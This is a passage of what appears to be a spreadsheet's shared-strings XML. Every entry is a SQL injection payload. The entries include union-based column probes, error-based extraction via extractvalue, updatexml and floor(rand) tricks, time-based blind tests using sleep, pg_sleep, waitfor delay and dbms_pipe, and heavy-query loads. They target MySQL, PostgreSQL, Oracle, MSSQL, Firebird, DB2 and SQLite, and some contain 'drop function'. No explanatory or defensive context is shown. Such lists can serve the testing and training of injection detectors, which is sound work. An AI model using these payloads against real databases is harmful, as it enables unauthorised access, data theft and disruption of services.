    <t>-8133' )  union all select 6417,6417,6417,6417,6417,6417,6417,6417--</t>
  </si>
  <si>
    <t>1%"  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%' union all select null,null,null--</t>
  </si>
  <si>
    <t>-1964' )  as ihsp where 6379 = 6379 or elt ( 6945 = 6165,6165 ) --</t>
  </si>
  <si>
    <t>select case when 2948 = 7279 then 1 else null end--</t>
  </si>
  <si>
    <t xml:space="preserve">1 and elt ( 1210 = 1210,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1'  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and 'fsvr' = 'fsvr</t>
  </si>
  <si>
    <t>1 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  -- jduw</t>
  </si>
  <si>
    <t>-4285'  )  )   )  union all select 8819,8819,8819,8819,8819,8819,8819,8819#</t>
  </si>
  <si>
    <t>1" where 7022 = 7022</t>
  </si>
  <si>
    <t>-9037%" union all select 6583#</t>
  </si>
  <si>
    <t xml:space="preserve">1' and elt ( 1210 = 1210,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( "yobb" like "yobb</t>
  </si>
  <si>
    <t>-7382'  )  )   or make_set ( 9425 = 4330,4330 )  and   (  (  'tvaz' like 'tvaz</t>
  </si>
  <si>
    <t>1" )  where 7840 = 7840 union all select null,null#</t>
  </si>
  <si>
    <t>-4562' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>-8651" )  where 8391 = 8391 union all select 8391,8391#</t>
  </si>
  <si>
    <t>-1844"  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( "abdw" like "abdw</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( 9847 = 9847</t>
  </si>
  <si>
    <t>-2745  )  )   as aywp where 9735 = 9735 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1"  )  )   as nejd where 2885 = 2885</t>
  </si>
  <si>
    <t>-4044%" or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) </t>
  </si>
  <si>
    <t>1%" and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "qzzg" like "qzzg</t>
  </si>
  <si>
    <t>select  ( case when  ( 7033 = 1594 )  then 7033 else 7033* ( select 7033 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-7296%'  )  )   )  union all select 9322,9322,9322,9322--</t>
  </si>
  <si>
    <t>5739-5738</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  'gydh' = 'gydh</t>
  </si>
  <si>
    <t>1%"  )  )   )  waitfor delay '0:0:5' and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-2605%'  )  )   )  union all select 4738,4738#</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "blkt" like "blkt</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 5726 = 5275 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1378 = 6569,1,1/0 ) </t>
  </si>
  <si>
    <t>-8004%' )  or  ( 2301 = 7504 ) *7504 and  ( '%' = '</t>
  </si>
  <si>
    <t>-1869"  )  )   )  union all select 7122,7122,7122,7122,7122,7122,7122,7122,7122--</t>
  </si>
  <si>
    <t>1" )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "hbgv" = "hbgv</t>
  </si>
  <si>
    <t>1" where 7015 = 7015 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>-7568"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122</t>
  </si>
  <si>
    <t>-2434'  )  )   )  union all select 5509,5509,5509,5509,5509,5509,5509--</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>-4919 )  union all select 2608,2608,2608,2608,2608,2608#</t>
  </si>
  <si>
    <t>-3194"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) #</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and 'fvda' like 'fvda</t>
  </si>
  <si>
    <t>1"  )  )   and 9800 = 8713</t>
  </si>
  <si>
    <t>-7448 union all select 4072,4072#</t>
  </si>
  <si>
    <t>-3126  )  )   union all select 6718,6718,6718,6718,6718--</t>
  </si>
  <si>
    <t>1'|| ( select 'kptj' from dual where 5123 = 5123</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-4583' )  as evbo where 6055 = 6055 union all select 6055--</t>
  </si>
  <si>
    <t>1'|| ( select 'hlxd' from dual where 2615 = 2615 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) ||'</t>
  </si>
  <si>
    <t>-5470'  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  'oeam' = 'oeam</t>
  </si>
  <si>
    <t>1 )  where 9149 = 9149 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'stsu' where 2386 = 2386 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq ) #</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-6848"  )  )   or 4071 = 5312</t>
  </si>
  <si>
    <t>1" )  where 2839 = 2839 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-6108' )  union all select 2519,2519,2519,2519--</t>
  </si>
  <si>
    <t>1' where 3125 = 3125  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1' and  ( 3020 = 3020 ) *6703 and 'hnvf' = 'hnvf</t>
  </si>
  <si>
    <t>1" or elt ( 6272 = 6272,sleep ( 5  )  )   and "hvic" like "hvic</t>
  </si>
  <si>
    <t>1%'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-3339' or 8571 = 8571--</t>
  </si>
  <si>
    <t>-4904' )  as ogyu where 2821 = 2821 or 5982 = 1643</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 7011 = 2522,1,1/0 ) </t>
  </si>
  <si>
    <t>1 )  as ozga where 4002 = 4002 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  'pfrt' = 'pfrt</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t>-2866'  )  )   or 4491 = 9429#</t>
  </si>
  <si>
    <t>1%" )  and elt ( 7436 = 9874,9874 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  and 7533 = 7533 and   (  (   ( "xopd" = "xopd</t>
  </si>
  <si>
    <t>1'|| ( select 'feyg' from dual where 7734 = 7734 and 3843 = 6724#</t>
  </si>
  <si>
    <t>1'  )  )   )  and make_set ( 6094 = 2929,2929 )  and   (  (   ( 'gkyo' = 'gkyo</t>
  </si>
  <si>
    <t>1"  )  )   as tncm where 8203 = 8203 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>1 where 3357 = 3357 and  ( 9492 = 4334 ) *4334--</t>
  </si>
  <si>
    <t>-2418'|| ( select 'mdbt' from dual where 3026 = 3026 union all select 3026,3026,3026,3026,3026,3026,3026,3026,3026--</t>
  </si>
  <si>
    <t>1 )  where 1203 = 1203 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 4858 = 4858</t>
  </si>
  <si>
    <t>-8745' )  as xpwv where 8855 = 8855 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t>1"  )  )   as dcrk where 5164 = 5164 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and 'fahy' like 'fahy</t>
  </si>
  <si>
    <t>-7379 union all select 9813,9813,9813,9813,9813,9813,9813,9813--</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   waitfor delay '0:0:5' and   (  (  'amnf' like 'amnf</t>
  </si>
  <si>
    <t>1 )  where 7881 = 7881 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1 where 4949 = 4949</t>
  </si>
  <si>
    <t>1 where 5627 = 5627 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select zmbu where 8685 = 8685 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) +'</t>
  </si>
  <si>
    <t>-1051" )  where 6586 = 6586 or 6647 = 6738#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( 'xcnj' = 'xcnj</t>
  </si>
  <si>
    <t>if ( 9690 = 6491 )  select 9690 else drop function nyln--</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'xemh' = 'xemh</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t>-8707' )  union all select 5609,5609,5609--</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>-4944%"  )  )   or make_set ( 1084 = 1988,1988 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 )  where 5048 = 5048 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-5385" union all select 4577,4577,4577,4577,4577,4577,4577#</t>
  </si>
  <si>
    <t>-9583%"  )  )   union all select 9349,9349,9349,9349,9349,9349,9349--</t>
  </si>
  <si>
    <t>1 )  as xuvz where 3061 = 3061 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-7876%' )  union all select 3909,3909,3909,3909,3909#</t>
  </si>
  <si>
    <t>1  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-6000" )  where 1797 = 1797 union all select 1797,1797,1797,1797,1797,1797,1797,1797--</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) +'</t>
  </si>
  <si>
    <t>-6942' )  union all select 7280,7280,7280#</t>
  </si>
  <si>
    <t>1' )  where 7887 = 7887 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>1%" )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-2216  )  )   as hxmq where 5677 = 5677 union all select 5677,5677--</t>
  </si>
  <si>
    <t>-4100'  )  )   union all select 1163,1163,1163--</t>
  </si>
  <si>
    <t>-6586'  )  )   or 2021 = 2996</t>
  </si>
  <si>
    <t>1 )  where 4810 = 4810 union all select null,null#</t>
  </si>
  <si>
    <t>-6757'  )  )   )  or 4524 = 3696</t>
  </si>
  <si>
    <t>1' )  and 4380 = 5851 and  ( 'cxcl' = 'cxcl</t>
  </si>
  <si>
    <t>1"  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  "vdyr" = "vdyr</t>
  </si>
  <si>
    <t>1%"  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1%' )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1 where 5401 = 5401 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   and make_set ( 6527 = 9529,9529 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1" )  as jscj where 2308 = 2308 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'inec' = 'inec</t>
  </si>
  <si>
    <t>1'+ ( select sshu where 3442 = 3442 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'pydi' like 'pydi</t>
  </si>
  <si>
    <t>1" )  rlike sleep ( 5 )  and  ( "efoq" like "efoq</t>
  </si>
  <si>
    <t>if ( 8995 = 9787 )  select 8995 else drop function ofgg--</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  8535 = 8535</t>
  </si>
  <si>
    <t>if ( 3593 = 3779 )  select 3593 else drop function qtqy--</t>
  </si>
  <si>
    <t>1'  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  'ylql' like 'ylql</t>
  </si>
  <si>
    <t>1'  )  )   as nlfq where 3410 = 3410 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>-6463"  )  )   )  union all select 3280,3280,3280,3280,3280,3280,3280,3280,3280#</t>
  </si>
  <si>
    <t>1"  )  )   as bosq where 4695 = 4695</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>1' where 7882 = 7882 and 6663 = 4524--</t>
  </si>
  <si>
    <t xml:space="preserve">elt ( 5098 = 2728,1 ) </t>
  </si>
  <si>
    <t>1%"  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-4068'  )  )   )  union all select 9491,9491,9491--</t>
  </si>
  <si>
    <t>-9697 )  union all select 3052,3052,3052,3052,3052,3052,3052,3052,3052--</t>
  </si>
  <si>
    <t>-2495  )  )   as hudw where 4197 = 4197 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 12</t>
  </si>
  <si>
    <t>1  )  )   as rhwg where 8843 = 8843</t>
  </si>
  <si>
    <t>1 and  ( 3020 = 3020 ) *6703-- zsnl</t>
  </si>
  <si>
    <t>1'  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'iaud' = 'iaud</t>
  </si>
  <si>
    <t>1%' and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and '%' = '</t>
  </si>
  <si>
    <t>-8812 or 6872 = 6872# dflr</t>
  </si>
  <si>
    <t>1 )  as nxmd where 8650 = 8650</t>
  </si>
  <si>
    <t>-9556' )  where 2472 = 2472 or  ( 2883 = 9968 ) *9968--</t>
  </si>
  <si>
    <t>1"  )  )   as qejm where 9014 = 9014 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%'  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select 'rkap' where 9692 = 9692</t>
  </si>
  <si>
    <t>1"  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "vlev" like "vlev</t>
  </si>
  <si>
    <t>1' )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'mseo' like 'mseo</t>
  </si>
  <si>
    <t>1 where 2988 = 2988 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>1 )  as qywz where 1864 = 1864 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'eoxk' where 6621 = 6621 union all select null,null#</t>
  </si>
  <si>
    <t>1' where 3188 = 3188 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1" where 4978 = 4978 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'+ ( select sxco where 1623 = 1623 union all select null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as rxxd where 5049 = 5049</t>
  </si>
  <si>
    <t>1' )  as afnt where 4719 = 4719 and elt ( 8224 = 1275,1275 ) --</t>
  </si>
  <si>
    <t>-6397%' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t>-2216" )  where 6692 = 6692 union all select 6692,6692,6692#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select rhlb where 9477 = 9477</t>
  </si>
  <si>
    <t>1' )  as sjzi where 8242 = 8242 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1 and make_set ( 9681 = 4703,4703 ) # zbrf</t>
  </si>
  <si>
    <t>1"  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "zptu" = "zptu</t>
  </si>
  <si>
    <t>-6357" )  order by 1--</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  "bhmu" like "bhmu</t>
  </si>
  <si>
    <t>1'|| ( select 'lmsc' from dual where 1162 = 1162 order by 1--</t>
  </si>
  <si>
    <t>select  ( case when  ( 5203 = 6330 )  then 5203 else 5203* ( select 5203 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-1190' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 </t>
  </si>
  <si>
    <t>-6081 where 3681 = 3681 or 2603 = 3138--</t>
  </si>
  <si>
    <t>1%'  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  where 5214 = 5214</t>
  </si>
  <si>
    <t>-1859' union all select 1781,1781,1781,1781#</t>
  </si>
  <si>
    <t>1" where 4213 = 4213 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 )  where 5309 = 5309 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1 )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 5621 = 5621</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( 7946 = 7946</t>
  </si>
  <si>
    <t>if ( 2695 = 9045 )  select 2695 else drop function qmno--</t>
  </si>
  <si>
    <t>-1600%"  )  )   )  or elt ( 4568 = 7693,7693 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1" )  where 7513 = 7513 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>1' )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>select * from generate_series ( 7494,7494,case when  ( 7494 = 7854 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>-6360' )  as yfrk where 3683 = 3683 union all select 3683,3683,3683,3683,3683,3683,3683,3683,3683#</t>
  </si>
  <si>
    <t>1'|| ( select 'nzjz' where 3539 = 3539 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
